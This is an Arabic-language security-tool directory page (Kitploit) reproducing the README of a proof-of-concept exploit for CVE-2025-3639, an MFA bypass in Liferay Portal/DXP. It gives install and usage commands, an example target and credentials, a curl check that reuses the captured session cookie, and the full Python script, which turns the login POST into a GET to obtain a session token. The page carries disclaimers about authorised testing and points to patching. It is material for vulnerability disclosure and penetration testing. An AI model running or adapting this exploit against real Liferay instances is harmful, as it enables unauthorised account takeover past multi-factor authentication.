Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3639 — ثغرة تجاوز تسجيل الدخول في Liferay Portal (الإصدارات 7.3.0–7.4.3.132) وLiferay DXP (إصدارات مختلفة من 2024.Q1 إلى 2025.Q1.6) | Kitploit
أدوات/GitHubGitHub/6lj/cve-2025-3639
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub6lj/cve-2025-3639

CVE-2025-3639

ثغرة تجاوز تسجيل الدخول في Liferay Portal (الإصدارات 7.3.0–7.4.3.132) وLiferay DXP (إصدارات مختلفة من 2024.Q1 إلى 2025.Q1.6)

عرض المستودع
24منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3639 PoC - تجاوز تسجيل الدخول في Liferay Portal/DXP

يحتوي هذا المستودع على إثبات المفهوم (PoC) لثغرة CVE-2025-3639، وهي ثغرة لتجاوز تسجيل الدخول في Liferay Portal (الإصدارات 7.3.0–7.4.3.132) وLiferay DXP (إصدارات متعددة من 2024.Q1 إلى 2025.Q1.6). يُظهر الإثبات كيف يمكن لمستخدم غير مصادق مع بيانات اعتماد صالحة تجاوز المصادقة متعددة العوامل (MFA) عن طريق تعديل طلب POST إلى طلب GET، مما قد يسمح بالوصول غير المصرح به إلى حسابات المستخدمين.

تحذير: إثبات المفهوم هذا هو لأغراض تعليمية فقط. الاختبار أو الاستغلال غير المصرح به لهذه الثغرة غير قانوني وغير أخلاقي. استخدمه فقط بإذن كتابي صريح من مالك النظام.

المتطلبات

  • البيئة: Linux (مثل Kali Linux أو Ubuntu أو إعداد افتراضي).
  • التبعيات:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • الشبكة: الوصول إلى مثيل Liferay Portal/DXP الهدف (يجب أن يكون في بيئة اختبار بإذن صريح).
  • بيانات الاعتماد: بيانات اعتماد مستخدم صالحة للمثيل الهدف.

التثبيت

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. تأكد من تثبيت Python 3 ومكتبة requests:

    root@kitploit:~
    pip3 install requests
    

ما يفعله

  • يستغل الإثبات ثغرة CVE-2025-3639 عن طريق تعديل طلب تسجيل دخول POST إلى طلب GET، متجاوزًا فحوصات MFA.
  • يرسل طلب HTTP GET مخصصًا مع بيانات اعتماد صالحة للمصادقة دون إكمال عملية MFA.
  • صُمم البرنامج النصي لإظهار الثغرة في بيئة خاضعة للتحكم ومصرح بها.

الاستخدام

شغّل البرنامج النصي للإثبات مع الوسائط المناسبة (استبدل <target_url> و <username> و <password> بعنوان URL لمثيل Liferay الهدف وبيانات اعتماد صالحة).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • الوسائط:
    • --target: عنوان URL لمثيل Liferay Portal/DXP (مثل http://example.com).
    • --username: اسم مستخدم صالح للمثيل الهدف.
    • --password: كلمة مرور صالحة لاسم المستخدم.

مثال

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

التحقق من النتائج

  • النجاح: إذا نجح الاستغلال، سيعيد البرنامج النصي رمز جلسة صالحًا أو رسالة نجاح تشير إلى الوصول إلى حساب المستخدم دون MFA.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • الإخراج المتوقع: تفاصيل المستخدم تؤكد المصادقة الناجحة.
  • الفشل: إذا أعاد الخادم خطأ (مثل 401 Unauthorized أو 403 Forbidden)، فقد لا يكون المثيل عرضة للثغرة، أو لم تكن MFA ممكّنة.

  • مراقبة حركة المرور: استخدم أداة مثل Wireshark لفحص حركة HTTP:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

نص الإثبات (PoC)

فيما يلي نموذج الكود لـ poc.py:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

ملاحظات مهمة

  • يتطلب هذا الإثبات بيانات اعتماد صالحة، حيث تسمح الثغرة بتجاوز MFA وليس تخمين بيانات الاعتماد.
  • اختبر فقط في بيئة خاضعة للتحكم وبإذن صريح من مالك النظام.
  • تم تصحيح الثغرة في الإصدارات الأحدث من Liferay Portal/DXP. قم بالتحديث إلى أحدث إصدار للتخفيف من هذه المشكلة.
  • Liferay Security Advisory
  • NVD CVE-2025-3639
  • GitHub Repository

إخلاء مسؤولية

هذا المشروع لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي استخدام غير مصرح به أو غير قانوني لهذا الإثبات. احصل دائمًا على إذن صريح من مالك النظام قبل الاختبار.

تنزيل الأداة